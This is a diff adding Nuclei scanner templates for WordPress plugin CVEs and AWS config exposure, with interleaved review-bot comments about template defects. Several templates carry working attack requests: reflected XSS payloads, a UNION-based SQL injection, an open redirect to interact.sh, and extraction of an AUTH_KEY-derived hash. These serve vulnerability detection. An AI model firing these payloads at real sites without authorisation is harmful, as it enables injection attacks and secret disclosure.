@@ -110487,6 +110559,7 @@ ./poc/other/sb-random-posts-widget.yaml ./poc/other/scalable-vector-graphics-svg-7ebcc23c4b2581aa9b5947fe9c79480d.yaml ./poc/other/scalable-vector-graphics-svg.yaml +./poc/other/scancircle.yaml ./poc/other/scarlet-3f3b8c7ed0767e56cd182742c3ecd621.yaml ./poc/other/scarlet-c082eca31214ee073d6c1b304a5ef86c.yaml ./poc/other/scarlet-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -111736,6 +111809,8 @@ ./poc/other/simple-nav-archives.yaml ./poc/other/simple-news-255def006aa11dd7cff8831e3d71b7b6.yaml ./poc/other/simple-news.yaml +./poc/other/simple-notification-afa7d78fbc3bbde326d4d78b8152b4bc.yaml +./poc/other/simple-notification-fdd7ff26d7f63a7b2fa52cbfdc17c04a.yaml ./poc/other/simple-org-chart-11ce1c2850e056152ce51409c1527728.yaml ./poc/other/simple-org-chart-76ee77ce8284ca42a790472577f97109.yaml ./poc/other/simple-org-chart.yaml @@ -112567,6 +112642,7 @@ ./poc/other/so-pinyin-slugs-f2aa28aa0471358187c21cf264a89ea0.yaml ./poc/other/so-pinyin-slugs.yaml ./poc/other/so-widgets-bundle-12246c67482cc81113f95b53d4a54f04.yaml +./poc/other/so-widgets-bundle-180c430fc45a724a110d6335d32e96f4.yaml ./poc/other/so-widgets-bundle-7815d5616dfb70208d5884aff281d688.yaml ./poc/other/so-widgets-bundle-92dc9daa82044d420b1ee35cdf66e7ae.yaml ./poc/other/so-widgets-bundle-92ee98fa3b74b713ba950a259247d7f6.yaml @@ -114001,6 +114077,7 @@ ./poc/other/tabs.yaml ./poc/other/tactical-rmm-panel.yaml ./poc/other/taeggie-feed-008b75688d8ae4824127311c231e062f.yaml +./poc/other/taeggie-feed.yaml ./poc/other/tag-groups-6c574efa4ff5ca03835b112134700152.yaml ./poc/other/tag-groups-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/tag-groups-fde2f6f8727bf54acffd47231a11cc05.yaml 
@@ -115120,6 +115197,7 @@ ./poc/other/tourfic-1d9f77d3fd1cac63b0f82e7f51ec4abc.yaml ./poc/other/tourfic-9780e2f7035fedce1d2d8e67b989062d.yaml ./poc/other/tourfic.yaml +./poc/other/tourmaster-a67429358d0ce99ecc6ba58dd169ed25.yaml ./poc/other/tournamatch-a4b5a383f7eb97489015438c5818a9fe.yaml ./poc/other/tournamatch-f0da102096d10873e37be9abd738c6d0.yaml ./poc/other/tournamatch.yaml @@ -116842,6 +116920,7 @@ ./poc/other/video-popup-027119af6a8a0485c97f2ee05eced458.yaml ./poc/other/video-popup.yaml ./poc/other/video-share-vod-3dfab9cfd6eeddeace596849813fffea.yaml +./poc/other/video-share-vod.yaml ./poc/other/video-sidebar-widgets-00cae4f2b686bd62cebad181eac9d2e4.yaml ./poc/other/video-sidebar-widgets.yaml ./poc/other/video-slider-with-thumbnails-9183fdebb835b88d6b445703dfa7423a.yaml @@ -116956,6 +117035,7 @@ ./poc/other/vironeer-installer.yaml ./poc/other/virtua-software-panel.yaml ./poc/other/virtual traffic manager.yaml +./poc/other/virtual-hdm-for-taxservice-am-b72e78d8893ace58a96e70e16ec3b4d7.yaml ./poc/other/virtual-robotstxt-littlebizzy-b63e739ce43d84ee439f614d7ac75bce.yaml ./poc/other/virtual-robotstxt-littlebizzy.yaml ./poc/other/virtual-smartzone-installer.yaml @@ -117642,6 +117722,7 @@ ./poc/other/wedevs-project-manager-621a86ac69fc43f58c97e1a34ee9115f.yaml ./poc/other/wedevs-project-manager-7123381f3f4a5c51e668bf50607c2d94.yaml ./poc/other/wedevs-project-manager-a8663c4ca882f11da72d9a6e11853e58.yaml +./poc/other/wedevs-project-manager-b583a50e24233331029e3cbee7dc09ae.yaml ./poc/other/wedevs-project-manager.yaml ./poc/other/wedocs-55347e9ac58126992d50d45693e54288.yaml ./poc/other/wedocs-621a86ac69fc43f58c97e1a34ee9115f.yaml 
@@ -117969,6 +118050,7 @@ ./poc/other/woc-open-close-plugin.yaml ./poc/other/woc-open-close.yaml ./poc/other/woc-order-alert.yaml +./poc/other/woffice-2b39d74568e88403e75df623ca0d523c.yaml ./poc/other/woffice-2d57976b09481b97c0392dd73606ab5a.yaml ./poc/other/woffice-72439da2c603de1022753a521e6e0bbb.yaml ./poc/other/woffice-a061e508f049f80f30df9a19c2bae78c.yaml @@ -120995,6 +121077,8 @@ ./poc/remote_code_execution/bitpay-checkout-for-woocommerce-9f687dc228a54cf40527d75fb8d70f1d.yaml ./poc/remote_code_execution/bitpay-checkout-for-woocommerce.yaml ./poc/remote_code_execution/bitrix-landing-rce.yaml +./poc/remote_code_execution/blaze-online-eparcel-for-woocommerce-028c8bf1a96949a8037d7ca57cb52eb5.yaml +./poc/remote_code_execution/blaze-online-eparcel-for-woocommerce-5a8844d4895daa0c0548d395338c8680.yaml ./poc/remote_code_execution/blind-rce.yaml ./poc/remote_code_execution/blog-designer-pack-rce.yaml ./poc/remote_code_execution/bng-gateway-for-woocommerce-087406cdf6eb3464703324d78c0d0ceb.yaml @@ -121797,6 +121881,7 @@ ./poc/remote_code_execution/image-source-control-isc-1f88dbd2b9c2d6237e296e8c6c1659c5.yaml ./poc/remote_code_execution/image-source-control-isc.yaml ./poc/remote_code_execution/imo-get-file-rce.yaml +./poc/remote_code_execution/import-export-for-woocommerce-bcf2ad7e63917a98b59c548c5519a59f.yaml ./poc/remote_code_execution/import-shopify-to-woocommerce-5deb9cef1a1765aac5362c5a9badb4e5.yaml ./poc/remote_code_execution/import-shopify-to-woocommerce.yaml ./poc/remote_code_execution/import-woocommerce-095fc39d2fec00ef5f77d197f7a50ae0.yaml 
@@ -128003,11 +128088,13 @@ ./poc/sql/CVE-2024-11902-6f1c9c51f7d943cb9a94f992fddb2671.yaml ./poc/sql/CVE-2024-11904-5fe3b58edbf68a55952920a93fb3f296.yaml ./poc/sql/CVE-2024-1209-262fb41bb4526e178dfcbc92b07bdb7c.yaml +./poc/sql/CVE-2024-12121-28bd43332ba5567c247178a27dbbf56c.yaml ./poc/sql/CVE-2024-12128-5b31f632a2dbc3187253dd9153d43eba.yaml ./poc/sql/CVE-2024-12219-5a4cdf95041f5cf0bd0b7732bf8309db.yaml ./poc/sql/CVE-2024-12309-a66a88222b4d4522bfdbcfa49436df90.yaml ./poc/sql/CVE-2024-12333-7b6d410c0b3b65296f542385dba469b2.yaml ./poc/sql/CVE-2024-12441-1756d8f05db11c9f2310e3f212f24527.yaml +./poc/sql/CVE-2024-12560-449215acaf31dbe73bdd1b194455c475.yaml ./poc/sql/CVE-2024-1293-affd9a0551db020dec750cedbcd3816e.yaml ./poc/sql/CVE-2024-1294-dfdb0dbdfc95da5675d873e172a0e0c4.yaml ./poc/sql/CVE-2024-1307-3df7481cb6a0937e107851abd321db33.yaml @@ -128418,6 +128505,7 @@ ./poc/sql/CVE-2024-43138-3379c404d07a8b6aa209bfd39e102fdb.yaml ./poc/sql/CVE-2024-43149-48bd2fb7dfa7c0ba66333db47a7aa078.yaml ./poc/sql/CVE-2024-43230-9e8adb139a0d7ed623bea89f5702e850.yaml +./poc/sql/CVE-2024-43234-7b1393281a86cb7c58f05352db8b36aa.yaml ./poc/sql/CVE-2024-4324-83e6d760adb900f9290e996e03752999.yaml ./poc/sql/CVE-2024-43241-808351d5b94024e25294db4171fbaa2f.yaml ./poc/sql/CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f.yaml @@ -128644,6 +128732,7 @@ ./poc/sql/CVE-2024-54207-6550e248932e2b5e412bf4389b4db0b2.yaml ./poc/sql/CVE-2024-54247-32dd452fd1db8cb528bb367644d98408.yaml ./poc/sql/CVE-2024-54250-80229f33352eda0e4db54b51c9f141a7.yaml +./poc/sql/CVE-2024-54262-900f1530db5979118c2aeaebba1c30e9.yaml ./poc/sql/CVE-2024-5431-241e169fe8d70647db15866852ef1ef7.yaml ./poc/sql/CVE-2024-5441-ac5094c9721ab0d78dbe312bf4fbf927.yaml ./poc/sql/CVE-2024-5459-5fe3da3314db32ae5a24560dc5ca6f8d.yaml 
@@ -130408,6 +130497,7 @@ ./poc/sql/easy-post-views-count-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/easy-prayer-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/easy-pricing-tables-e4bddb00b4325b40d1d281bc3333cfb1.yaml +./poc/sql/easy-replace-440c0e499d1853ea7db9693e4d2afca2.yaml ./poc/sql/easy-set-favicon-cd265eedeaef7dbc17fe04f8ffa41e3d.yaml ./poc/sql/easy-settings-for-learndash-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/easy-smooth-scroll-links-6477bf18cad6c823db485408d49b337b.yaml @@ -138638,6 +138728,7 @@ ./poc/wordpress/auto-location-for-wp-job-manager.yaml ./poc/wordpress/automatorwp-3d36e817ef5d4492783d01a29ff6fe85.yaml ./poc/wordpress/automatorwp-4110bf0add7c875f1c9709918ab76148.yaml +./poc/wordpress/automatorwp-c0407e34fa2c909d246b6b41858c80c4.yaml ./poc/wordpress/automatorwp-c6ee3483afd7756ed85b9c0f71a85fc0.yaml ./poc/wordpress/automatorwp-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/automatorwp-d4af396f563d5f931b0131849342faa6.yaml diff --git a/poc/auth/accept-authorize-net-payments-using-contact-form-7.yaml b/poc/auth/accept-authorize-net-payments-using-contact-form-7.yaml new file mode 100644 index 0000000000..f2879a4428 --- /dev/null +++ b/poc/auth/accept-authorize-net-payments-using-contact-form-7.yaml 
@@ -0,0 +1,59 @@
+id: accept-authorize-net-payments-using-contact-form-7-236bcbdbfe25f4f674ac30a10158deed
+
+info:
+ name: >
+ Accept Authorize.NET Payments Using Contact Form 7 <= 2.2 - Unauthenticated Information Exposure
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d8801b9a-afcb-483b-a018-4f68448e96de?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/"
+ google-query: inurl:"/wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,accept-authorize-net-payments-using-contact-form-7,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "accept-authorize-net-payments-using-contact-form-7"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2')
\ No newline at end of file
diff --git a/poc/aws/amazon-docker-config-exposure.yaml b/poc/aws/amazon-docker-config-exposure.yaml
new file mode 100644
index 0000000000..c006721468
--- /dev/null
+++ b/poc/aws/amazon-docker-config-exposure.yaml
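Review bot: The template's `id` still carries the `-236bcbdbfe25f4f674ac30a10158deed` suffix of the sibling file that the poc.txt hunk lists immediately above the new path, so the two files presumably share one id and a loader that keys templates by id will report them as duplicates or silently keep only one; set `id: accept-authorize-net-payments-using-contact-form-7` to match the new file name. `description: >` is an empty folded scalar and `cvss-metrics`, `cvss-score` and `cve-id` are left blank while `tags` includes `cve`, which makes a hit hard to triage without opening the Wordfence link; fill the description from the referenced advisory and drop the `cve` tag if no CVE id is assigned. `shodan-query: 'vuln:'` is an unfilled placeholder and can be removed. The two `version` extractors are the usual internal/output pair feeding the `compare_versions` matcher and look fine.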
@@ -0,0 +1,17 @@
+id: amazon-docker-config-disclosure
+
+info:
+ name: Dockerrun AWS Configuration Exposure
+ author: pd-team
+ severity: medium
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/Dockerrun.aws.json'
+ matchers:
+ - type: word
+ words:
+ - 'AWSEBDockerrunVersion'
+ - 'containerDefinitions'
+ condition: and
\ No newline at end of file
diff --git a/poc/config/amazon-docker-config-exposure.yaml b/poc/config/amazon-docker-config-exposure.yaml
new file mode 100644
index 0000000000..c006721468
--- /dev/null
+++ b/poc/config/amazon-docker-config-exposure.yaml
@@ -0,0 +1,17 @@
+id: amazon-docker-config-disclosure
+
+info:
+ name: Dockerrun AWS Configuration Exposure
+ author: pd-team
+ severity: medium
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/Dockerrun.aws.json'
+ matchers:
+ - type: word
+ words:
+ - 'AWSEBDockerrunVersion'
+ - 'containerDefinitions'
+ condition: and
\ No newline at end of file
diff --git a/poc/cve/CVE-2012-0901-2139.yaml b/poc/cve/CVE-2012-0901-2139.yaml
new file mode 100644
index 0000000000..2a8c5c433b
--- /dev/null
+++ b/poc/cve/CVE-2012-0901-2139.yaml
@@ -0,0 +1,30 @@
+id: CVE-2012-0901
+
+info:
+ name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901
+
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
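Review bot: The new file is named `amazon-docker-config-exposure.yaml` but its first line is `id: amazon-docker-config-disclosure`, the id of the existing `amazon-docker-config-disclosure.yaml` in the same directory (listed in the poc.txt index), so the two collide; the id should follow the file stem, `id: amazon-docker-config-exposure`. The same applies to the byte-identical copy added under `poc/config/` (same blob `c006721468`), which also carries the colliding id. Both use the older `requests:` key while the other templates added in this commit use `http:`; converting them keeps the set consistent with current nuclei syntax.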
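Review bot: The body matcher `words: - ""` is an empty string, which every response body contains, so that matcher is a no-op and the template fires on any `200 text/html` reply from that path, a false positive for every site with the plugin installed, vulnerable or not. It looks as if the expected marker was lost when the file was produced; the word should be the specific string the `path` request expects to see reflected in the page, or the matcher should be removed and the template documented as detection-only. The same empty matcher appears in `CVE-2014-4544-2362.yaml` (`- ""`) and `CVE-2021-39322-6339.yaml` (`- ''`) in this commit.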
diff --git a/poc/cve/CVE-2014-4544-2362.yaml b/poc/cve/CVE-2014-4544-2362.yaml
new file mode 100644
index 0000000000..7c453acbc4
--- /dev/null
+++ b/poc/cve/CVE-2014-4544-2362.yaml
@@ -0,0 +1,37 @@
+id: CVE-2014-4544
+
+info:
+ name: Podcast Channels < 0.28 - Unauthenticated Reflected XSS
+ author: daffainfo
+ severity: medium
+ description: The Podcast Channels WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability.
+ reference:
+ - https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-4544
+
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2014-4544
+ cwe-id: CWE-79
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2021-24750-5763.yaml b/poc/cve/CVE-2021-24750-5763.yaml
new file mode 100644
index 0000000000..4b0459eb3b
--- /dev/null
+++ b/poc/cve/CVE-2021-24750-5763.yaml
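Review bot: The request `path` spells the plugin directory `podcast–channels` with an en dash (U+2013) rather than an ASCII hyphen, so the request never reaches the real plugin folder and the template silently reports nothing even on affected sites; presumably `podcast-channels` was intended, matching the plugin slug. The file also has no `tags` key, so it is skipped by tag-based runs (`cve`, `wordpress`, `xss`) that select its siblings.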
@@ -0,0 +1,43 @@
+id: CVE-2021-24750
+
+info:
+ name: WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI
+ author: cckuakilong
+ severity: high
+ description: The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks.
+ reference:
+ - https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24750
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2021-24750
+ cwe-id: CWE-89
+ tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "266f89556d2b38ff067b580fb305c522"
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2021-25111-5801.yaml b/poc/cve/CVE-2021-25111-5801.yaml
new file mode 100644
index 0000000000..506e3d7994
--- /dev/null
+++ b/poc/cve/CVE-2021-25111-5801.yaml
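Review bot: The template depends on `{{username}}` and `{{password}}` being supplied at run time (the login POST in the first `raw` block), but nothing in the file says so; without them the placeholders presumably go out unresolved and the second matcher simply never hits, which reads as "not vulnerable". A comment next to `tags: ...authenticated`, such as `# Requires an authenticated run: supply username/password as template vars`, would prevent that silent no-result. The body matcher compares against the bare hex literal `266f89556d2b38ff067b580fb305c522`; a one-line comment stating what it is (presumably the MD5 of the string `CVE-2021-24750` used in the request) lets a reviewer verify it without recomputing.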
@@ -0,0 +1,26 @@
+id: CVE-2021-25111
+
+info:
+ name: English WordPress Admin < 1.5.2 - Unauthenticated Open Redirect
+ author: akincibor
+ severity: medium
+ description: The plugin does not validate the admin_custom_language_return_url before redirecting users o it, leading to an open redirect issue.
+ reference:
+ - https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4
+ tags: wp-plugin,redirect,wordpress,wp,cve,cve2021,unauth
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-25111
+ cwe-id: CWE-601
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh"
+
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/poc/cve/CVE-2021-38314-6300.yaml b/poc/cve/CVE-2021-38314-6300.yaml
new file mode 100644
index 0000000000..46927bbbb5
--- /dev/null
+++ b/poc/cve/CVE-2021-38314-6300.yaml
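Review bot: The `description` line has a typo, `redirecting users o it` should read `redirecting users to it`. The `reference` list cites only the WPScan entry; adding the NVD entry for CVE-2021-25111, as the other CVE templates in this commit do, keeps attribution consistent. The only matcher is the `Location` header regex and no callback is awaited, which is fine for detection but worth stating for triagers, e.g. `# Location header check only - no interactsh callback is required`.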
@@ -0,0 +1,51 @@
+id: CVE-2021-38314
+
+info:
+ name: Redux Framework - Unauthenticated Sensitive Information Disclosure
+ author: meme-lord
+ severity: medium
+ reference:
+ - https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/
+ - https://wahaz.medium.com/unauthenticated-sensitive-information-disclosure-at-redacted-2702224098c
+ - https://blog.sorcery.ie/posts/redux_wordpress/
+
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.30
+ cve-id: CVE-2021-38314
+ description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site’s `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`."
+
+requests:
+ - raw:
+ - |
+ GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+
+ - |
+ GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - "len(body)<50"
+
+ - type: regex
+ name: meme
+ regex:
+ - '[a-f0-9]{32}'
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - "[a-f0-9]{32}"
diff --git a/poc/cve/CVE-2021-39322-6339.yaml b/poc/cve/CVE-2021-39322-6339.yaml
new file mode 100644
index 0000000000..80b3ada7a5
--- /dev/null
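Review bot: The regex matcher is named `meme` (`name: meme`), which tells a reader nothing; since it and the trailing extractor both pull the 32-hex value the description identifies as an MD5 over `AUTH_KEY` and `SECURE_AUTH_KEY`, a name such as `auth-key-hash` would document what a match means. The file has no `tags` key, and its `description` comes after the `classification` fields instead of next to `name`/`author` as in the other templates of this commit. For triage: the extractor writes that hash into scan output, so result files from this template carry secret-derived material and should be stored and shared with that in mind; a short comment on the extractor saying so would help.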
+++ b/poc/cve/CVE-2021-39322-6339.yaml
@@ -0,0 +1,52 @@
+id: CVE-2021-39322
+
+info:
+ name: WordPress Easy Social Icons Plugin < 3.0.9 - Reflected Cross-Site Scripting
+ author: dhiyaneshDK
+ severity: medium
+ description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path.
+ reference:
+ - https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-39322
+ - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39322
+ - https://wpvulndb.com/vulnerabilities/5e0bf0b6-9809-426b-b1d4-1fb653083b58
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-39322
+ cwe-id: CWE-79
+ tags: wordpress,cve,cve2021,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/admin.php//?page=cnss_social_icon_page HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ''
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+# Enhanced by mp on 2022/03/23
diff --git a/poc/cve/CVE-2024-10548-c2c6f9682e36d499e8bfec31ce1d8b0c.yaml b/poc/cve/CVE-2024-10548-c2c6f9682e36d499e8bfec31ce1d8b0c.yaml
new file mode 100644
index 0000000000..6d5227800c
--- /dev/null
+++ b/poc/cve/CVE-2024-10548-c2c6f9682e36d499e8bfec31ce1d8b0c.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10548-c2c6f9682e36d499e8bfec31ce1d8b0c
+
+info:
+ name: >
+ WP Project Manager <= 2.6.15 - Authenticated (Subscriber+) Sensitive Information Exposure via Project Task List REST API
+ author: topscoder
+ severity: low
+ description: >
+ The WP Project Manager plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.15 via the Project Task List ('/wp-json/pm/v2/projects/1/task-lists') REST API endpoint. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive data including the hashed passwords of project owners (e.g. adminstrators).
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a21b7c40-2090-4262-9105-346db2325612?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2024-10548
+ metadata:
+ fofa-query: "wp-content/plugins/wedevs-project-manager/"
+ google-query: inurl:"/wp-content/plugins/wedevs-project-manager/"
+ shodan-query: 'vuln:CVE-2024-10548'
+ tags: cve,wordpress,wp-plugin,wedevs-project-manager,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wedevs-project-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wedevs-project-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.6.15')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11254.yaml b/poc/cve/CVE-2024-11254.yaml
new file mode 100644
index 0000000000..1184fe6f99
--- /dev/null
+++ b/poc/cve/CVE-2024-11254.yaml
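Review bot: `severity: low` (and the `low` tag) contradicts the template's own `cvss-score: 6.5`, which sits in the CVSS medium band (4.0–6.9), so anyone filtering by severity will miss it; `severity: medium` and a `medium` tag would agree with the score. The same disagreement recurs in this commit: `CVE-2024-11439`, `CVE-2024-11748` and `CVE-2024-11881` carry `low` with a 6.4 score, `CVE-2024-11926` carries `low` with 6.5, and `CVE-2024-11912` and `CVE-2024-12025` are marked `critical` with a 7.5 score, which is the high band (7.0–8.9). Separately, `adminstrators` in the description should read `administrators`.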
@@ -0,0 +1,59 @@
+id: CVE-2024-11254-0a41e95f2c7eae4094eccfb9191bc605
+
+info:
+ name: >
+ AMP for WP – Accelerated Mobile Pages <= 1.1.1 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The AMP for WP – Accelerated Mobile Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the disqus_name parameter in all versions up to, and including, 1.1.1 due to insufficient input validation. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5da82149-c827-4574-8269-b2b798edca59?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11254
+ metadata:
+ fofa-query: "wp-content/plugins/accelerated-mobile-pages/"
+ google-query: inurl:"/wp-content/plugins/accelerated-mobile-pages/"
+ shodan-query: 'vuln:CVE-2024-11254'
+ tags: cve,wordpress,wp-plugin,accelerated-mobile-pages,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/accelerated-mobile-pages/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "accelerated-mobile-pages"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11291.yaml b/poc/cve/CVE-2024-11291.yaml
new file mode 100644
index 0000000000..13a5e732fe
--- /dev/null
+++ b/poc/cve/CVE-2024-11291.yaml
